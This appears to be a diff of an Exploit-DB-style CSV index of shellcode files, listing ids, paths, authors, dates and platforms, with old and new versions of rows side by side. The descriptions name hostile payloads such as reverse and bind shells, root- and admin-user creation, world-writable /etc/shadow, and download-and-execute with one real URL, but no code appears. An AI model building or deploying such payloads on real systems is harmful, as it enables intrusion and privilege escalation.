13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - WinExec (cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
13915,shellcodes/linux_x86-64/13915.c,"Linux/x64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA() + CreateProcessA() + ExitProcess() Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.c,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - WinExec(cmd.exe) + ExitProcess Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
14119,shellcodes/linux_x86/14119.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (116 bytes)",2010-06-29,gunslinger_,shellcode,linux_x86
14142,shellcodes/arm/14142.c,"Linux/ARM - chmod 0777 /etc/shadow + Polymorphic Shellcode (84 bytes)",2010-06-30,"Florian Gaultier",shellcode,arm
14122,shellcodes/arm/14122.txt,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14122,shellcodes/arm/14122.c,"Linux/ARM - chmod 0777 /etc/shadow Shellcode (35 bytes)",2010-06-29,"Florian Gaultier",shellcode,arm
14139,shellcodes/arm/14139.c,"Linux/ARM - Disable ASLR Security Shellcode (102 bytes)",2010-06-30,"Jonathan Salwan",shellcode,arm
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
@ -396,10 +396,10 @@ id,file,description,date,author,type,platform
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14305,shellcodes/linux_x86-64/14305.c,"Linux/x64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA() Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
@ -413,34 +413,34 @@ id,file,description,date,author,type,platform
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15618,shellcodes/osx/15618.c,"OSX/x64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (66+ bytes) (Generator) (Metasploit)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
16283,shellcodes/windows_x86/16283.asm,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17194,shellcodes/linux_x86/17194.c,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17545,shellcodes/windows_x86/17545.c,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17564,shellcodes/osx/17564.asm,"OSX/x64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
18154,shellcodes/superh_sh4/18154.c,"Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)",2011-11-24,"Jonathan Salwan",shellcode,superh_sh4
18162,shellcodes/linux_mips/18162.c,"Linux/MIPS - execve(/bin/sh) Shellcode (48 bytes)",2011-11-27,rigan,shellcode,linux_mips
18163,shellcodes/linux_mips/18163.c,"Linux/MIPS - Add Root User (rOOt/pwn3d) To /etc/passwd Shellcode (164 bytes)",2011-11-27,rigan,shellcode,linux_mips
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18197,shellcodes/linux_x86-64/18197.c,"Linux/x64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18585,shellcodes/linux_x86-64/18585.s,"Linux/x64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
20196,shellcodes/linux_x86/20196.c,"Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
@ -448,9 +448,9 @@ id,file,description,date,author,type,platform
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40890,shellcodes/windows_x86-64/40890.c,"Windows/x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7) - URLDownloadToFile(http://bflow.security-portal.cz/down/xy.txt) + WinExec() + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
@ -461,23 +461,23 @@ id,file,description,date,author,type,platform
28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
33836,shellcodes/windows/33836.c,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34667,shellcodes/linux_x86-64/34667.c,"Linux/x64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35205,shellcodes/linux_x86-64/35205.asm,"Linux/x64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.c,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + Stop Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36411,shellcodes/generator/36411.py,"Windows/x64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36359,shellcodes/linux_x86-64/36359.c,"Linux/x64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
@ -494,7 +494,7 @@ id,file,description,date,author,type,platform
36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36858,shellcodes/linux_x86-64/36858.c,"Linux/x64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
37069,shellcodes/linux_x86/37069.c,"Linux/x86 - execve(/bin/sh) Shellcode (26 bytes)",2015-05-20,"Reza Behzadpour",shellcode,linux_x86
@ -504,7 +504,7 @@ id,file,description,date,author,type,platform
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37362,shellcodes/linux_x86-64/37362.c,"Linux/x64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
@ -512,104 +512,104 @@ id,file,description,date,author,type,platform
37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode (Generator)",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox(Hello World!) + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode (Generator)",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
38116,shellcodes/linux_x86/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",shellcode,linux_x86
38126,shellcodes/osx/38126.c,"OSX/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38126,shellcodes/osx/38126.c,"OSX/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",shellcode,osx
38150,shellcodes/linux_x86-64/38150.txt,"Linux/x64 - execve(/bin/sh) Shellcode (34 bytes)",2015-09-11,"Fanda Uchytil",shellcode,linux_x86-64
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
